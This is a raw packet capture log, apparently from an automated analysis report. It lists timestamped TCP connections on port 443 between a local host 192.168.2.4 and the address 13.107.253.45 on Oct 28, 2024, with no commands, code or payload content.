                                                                                                                                                                            Oct 28, 2024 19:12:22.155791044 CET4434978013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.161062956 CET4434977813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.161493063 CET49778443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.161510944 CET4434977813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.161958933 CET49778443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.161964893 CET4434977813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.170928955 CET4434978113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.171354055 CET49781443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.171365023 CET4434978113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.171715975 CET49781443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.171721935 CET4434978113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.172296047 CET4434978213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.172555923 CET49782443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.172563076 CET4434978213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.172893047 CET49782443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.172897100 CET4434978213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.175718069 CET4434977913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.176008940 CET49779443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.176069975 CET4434977913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.176309109 CET49779443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.176323891 CET4434977913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.288960934 CET4434978013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.289339066 CET4434978013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.290585995 CET49780443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.290810108 CET49780443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.290810108 CET49780443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.290832996 CET4434978013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.290841103 CET4434978013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.293685913 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.293757915 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.293843985 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.293976068 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.294008970 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.300751925 CET4434977813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.301790953 CET4434977813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.301860094 CET49778443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.302086115 CET49778443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.302102089 CET4434977813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.302114010 CET49778443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.302119017 CET4434977813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.304344893 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.304410934 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.304502964 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.304611921 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.304640055 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.308912992 CET4434978113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.309043884 CET4434978113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.309117079 CET49781443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.309262991 CET49781443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.309263945 CET49781443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.309288025 CET4434978113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.309302092 CET4434978113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.311351061 CET4434977913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.311589956 CET4434977913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.311686993 CET49779443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.312069893 CET49779443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.312104940 CET4434978213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.312112093 CET4434977913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.312144041 CET49779443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.312159061 CET4434977913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.312172890 CET4434978213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.312247992 CET49782443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.312339067 CET49782443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.312339067 CET49782443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.312345982 CET4434978213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.312352896 CET4434978213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.313494921 CET49785443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.313560963 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.313644886 CET49785443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.313798904 CET49785443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.313832998 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.315299034 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.315346003 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.315414906 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.316286087 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.316309929 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.316375971 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.316452980 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.316478968 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:22.316518068 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:22.316541910 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.201672077 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.201730967 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.203037024 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.203095913 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.203808069 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.203823090 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.204232931 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.204263926 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.204737902 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.204750061 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.339941978 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.340053082 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.340140104 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.340413094 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.340451956 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.340477943 CET49784443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.340511084 CET4434978413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.343449116 CET49788443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.343498945 CET4434978813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.343576908 CET49788443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.343753099 CET49788443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.343769073 CET4434978813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.345747948 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.346021891 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.346416950 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.346445084 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.346709013 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.346785069 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.346920967 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.346931934 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.346946955 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.347079992 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.347227097 CET49785443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.347255945 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.347435951 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.347451925 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.347697973 CET49785443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.347703934 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.347870111 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.347875118 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.348021984 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.348040104 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.348052025 CET49783443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.348057985 CET4434978313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.350341082 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.350379944 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.350488901 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.350641012 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.350657940 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.484004974 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.484333038 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.485434055 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.485562086 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.485637903 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.485686064 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.485691071 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.485707998 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.485716105 CET49787443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.485723019 CET4434978713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.486872911 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.486893892 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.486901999 CET49786443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.486908913 CET4434978613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.489609957 CET49790443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.489650011 CET4434979013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.489733934 CET49790443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.490633011 CET49791443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.490667105 CET4434979113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.490736961 CET49790443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.490751982 CET4434979013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.490773916 CET49791443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.490905046 CET49791443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.490921974 CET4434979113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.491501093 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.491584063 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.491656065 CET49785443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.491775036 CET49785443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.491782904 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.491795063 CET49785443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.491800070 CET4434978513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.493741989 CET49792443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.493808031 CET4434979213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:23.493884087 CET49792443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.494064093 CET49792443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:23.494096994 CET4434979213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.107336998 CET4434978813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.109571934 CET49788443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.109606981 CET4434978813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.110064030 CET49788443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.110094070 CET4434978813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.145442009 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.149281979 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.149312019 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.149770021 CET49789443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.149776936 CET4434978913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.251151085 CET4434978813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.251296997 CET4434978813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.251368999 CET49788443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.251596928 CET49788443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.251616001 CET4434978813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.251629114 CET49788443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.251636028 CET4434978813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.256179094 CET49793443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.256263971 CET4434979313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.256350994 CET49793443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.256546974 CET49793443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.256566048 CET4434979313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.288312912 CET4434979113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.288978100 CET49791443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.289001942 CET4434979113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.289474010 CET49791443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.289480925 CET4434979113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.290638924 CET4434979213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.290927887 CET49792443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.290987015 CET4434979213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.291286945 CET49792443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.291301012 CET4434979213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.291862011 CET4434979013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.292123079 CET49790443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.292136908 CET4434979013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.292438984 CET49790443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.292445898 CET4434979013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.424463034 CET4434979113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.425199032 CET4434979113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.425272942 CET49791443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.428618908 CET4434979213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.428699970 CET4434979213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.428759098 CET49792443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.429589987 CET49791443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.429608107 CET4434979113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.429621935 CET49791443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.429629087 CET4434979113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.430443048 CET49792443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.430479050 CET4434979213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.430507898 CET49792443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.430524111 CET4434979213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.433001041 CET4434979013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.433141947 CET4434979013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.433202982 CET49790443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.442500114 CET49794443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.442543983 CET4434979413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.442627907 CET49794443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.449598074 CET49790443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.449610949 CET4434979013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.449625015 CET49790443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.449630976 CET4434979013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.450542927 CET49794443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.450582027 CET4434979413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.468019009 CET49795443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.468060970 CET4434979513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.468161106 CET49795443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.469012022 CET49796443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.469043970 CET4434979613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.469106913 CET49796443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.469175100 CET49795443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.469193935 CET4434979513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:24.469300032 CET49796443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:24.469314098 CET4434979613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.029480934 CET4434979313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.056845903 CET49793443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.056904078 CET4434979313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.057367086 CET49793443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.057383060 CET4434979313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.190577984 CET4434979313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.190834999 CET4434979313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.190911055 CET49793443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.191927910 CET4434979413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.193383932 CET49793443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.193424940 CET4434979313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.193451881 CET49793443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.193466902 CET4434979313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.201944113 CET49794443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.202002048 CET4434979413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.202373028 CET49794443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.202394009 CET4434979413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.210712910 CET49797443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.210757017 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.210844994 CET49797443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.211028099 CET49797443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.211046934 CET4434979713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.215265036 CET4434979613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.215600967 CET49796443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.215642929 CET4434979613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.219738960 CET49796443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.219748020 CET4434979613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.261317015 CET4434979513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.262121916 CET49795443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.262145042 CET4434979513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.266562939 CET49795443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.266577005 CET4434979513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.334047079 CET4434979413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.334142923 CET4434979413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.334239960 CET49794443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.338645935 CET49794443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.338684082 CET4434979413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.338713884 CET49794443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.338732004 CET4434979413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.350482941 CET4434979613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.350653887 CET4434979613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.350725889 CET49796443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.358685970 CET49796443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.358685970 CET49796443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.358710051 CET4434979613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.358721018 CET4434979613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.377048016 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.377100945 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.377198935 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.388154030 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.388185978 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.388247013 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.388345957 CET49798443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.388362885 CET4434979813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.388720989 CET49799443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:25.388739109 CET4434979913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:25.404266119 CET4434979513.107.253.45192.168.2.4
